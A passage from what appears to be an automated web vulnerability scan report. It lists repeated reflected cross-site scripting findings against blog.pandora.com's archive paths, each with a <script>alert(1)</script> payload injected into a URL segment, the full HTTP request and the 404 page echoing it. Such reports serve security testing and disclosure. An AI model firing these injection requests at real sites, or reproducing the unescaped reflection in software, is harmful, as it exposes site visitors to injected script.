Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 353

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraf5c1c<script>alert(1)</script>f85b07012ec/archives/mississippi/ was not found on this server.</p>
...[SNIP]...

3.367. http://blog.pandora.com/pandora/archives/mississippi/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/mississippi/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f4c87<script>alert(1)</script>6fe976a7326 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesf4c87<script>alert(1)</script>6fe976a7326/mississippi/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 353

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf4c87<script>alert(1)</script>6fe976a7326/mississippi/ was not found on this server.</p>
...[SNIP]...

3.368. http://blog.pandora.com/pandora/archives/mississippi/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/mississippi/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9c40e<script>alert(1)</script>d255db79943 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/mississippi9c40e<script>alert(1)</script>d255db79943/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 353

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/mississippi9c40e<script>alert(1)</script>d255db79943/ was not found on this server.</p>
...[SNIP]...

3.369. http://blog.pandora.com/pandora/archives/missouri/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/missouri/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e7363<script>alert(1)</script>be446c1f728 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorae7363<script>alert(1)</script>be446c1f728/archives/missouri/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorae7363<script>alert(1)</script>be446c1f728/archives/missouri/ was not found on this server.</p>
...[SNIP]...

3.370. http://blog.pandora.com/pandora/archives/missouri/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/missouri/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 80b38<script>alert(1)</script>f1ed4fecb73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives80b38<script>alert(1)</script>f1ed4fecb73/missouri/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:06 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives80b38<script>alert(1)</script>f1ed4fecb73/missouri/ was not found on this server.</p>
...[SNIP]...

3.371. http://blog.pandora.com/pandora/archives/missouri/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/missouri/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a14db<script>alert(1)</script>9908a654cd7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/missouria14db<script>alert(1)</script>9908a654cd7/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/missouria14db<script>alert(1)</script>9908a654cd7/ was not found on this server.</p>
...[SNIP]...

3.372. http://blog.pandora.com/pandora/archives/nebraska/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/nebraska/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7cece<script>alert(1)</script>58d715564b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora7cece<script>alert(1)</script>58d715564b1/archives/nebraska/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 350
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora7cece<script>alert(1)</script>58d715564b1/archives/nebraska/ was not found on this server.</p>
...[SNIP]...

3.373. http://blog.pandora.com/pandora/archives/nebraska/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/nebraska/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70673<script>alert(1)</script>a0d7ecee19d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives70673<script>alert(1)</script>a0d7ecee19d/nebraska/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives70673<script>alert(1)</script>a0d7ecee19d/nebraska/ was not found on this server.</p>
...[SNIP]...

3.374. http://blog.pandora.com/pandora/archives/nebraska/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/nebraska/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload de711<script>alert(1)</script>23fb059918f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/nebraskade711<script>alert(1)</script>23fb059918f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/nebraskade711<script>alert(1)</script>23fb059918f/ was not found on this server.</p>
...[SNIP]...

3.375. http://blog.pandora.com/pandora/archives/new-jersey/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/new-jersey/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 338e6<script>alert(1)</script>4ab9dcf9e4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora338e6<script>alert(1)</script>4ab9dcf9e4e/archives/new-jersey/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora338e6<script>alert(1)</script>4ab9dcf9e4e/archives/new-jersey/ was not found on this server.</p>
...[SNIP]...

3.376. http://blog.pandora.com/pandora/archives/new-jersey/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/new-jersey/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 753ff<script>alert(1)</script>0065a69c7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives753ff<script>alert(1)</script>0065a69c7bb/new-jersey/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives753ff<script>alert(1)</script>0065a69c7bb/new-jersey/ was not found on this server.</p>
...[SNIP]...

3.377. http://blog.pandora.com/pandora/archives/new-jersey/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/new-jersey/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97d30<script>alert(1)</script>d935da65367 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/new-jersey97d30<script>alert(1)</script>d935da65367/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/new-jersey97d30<script>alert(1)</script>d935da65367/ was not found on this server.</p>
...[SNIP]...

3.378. http://blog.pandora.com/pandora/archives/new-york/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/new-york/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f622<script>alert(1)</script>04772bbc023 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora7f622<script>alert(1)</script>04772bbc023/archives/new-york/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 350
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora7f622<script>alert(1)</script>04772bbc023/archives/new-york/ was not found on this server.</p>
...[SNIP]...

3.379. http://blog.pandora.com/pandora/archives/new-york/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/new-york/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 33fe0<script>alert(1)</script>cbd4cc45e8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives33fe0<script>alert(1)</script>cbd4cc45e8c/new-york/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives33fe0<script>alert(1)</script>cbd4cc45e8c/new-york/ was not found on this server.</p>
...[SNIP]...

3.380. http://blog.pandora.com/pandora/archives/new-york/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/new-york/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3aeb2<script>alert(1)</script>3e9b7737a01 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/new-york3aeb2<script>alert(1)</script>3e9b7737a01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/new-york3aeb2<script>alert(1)</script>3e9b7737a01/ was not found on this server.</p>
...[SNIP]...

3.381. http://blog.pandora.com/pandora/archives/north-carolina/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/north-carolina/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad877<script>alert(1)</script>2e63fd05877 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraad877<script>alert(1)</script>2e63fd05877/archives/north-carolina/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraad877<script>alert(1)</script>2e63fd05877/archives/north-carolina/ was not found on this server.</p>
...[SNIP]...

3.382. http://blog.pandora.com/pandora/archives/north-carolina/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/north-carolina/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bf6f<script>alert(1)</script>8d5991e8eea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5bf6f<script>alert(1)</script>8d5991e8eea/north-carolina/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 356

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5bf6f<script>alert(1)</script>8d5991e8eea/north-carolina/ was not found on this server.</p>
...[SNIP]...

3.383. http://blog.pandora.com/pandora/archives/north-carolina/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/north-carolina/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 31bd3<script>alert(1)</script>2c5162fd032 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/north-carolina31bd3<script>alert(1)</script>2c5162fd032/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
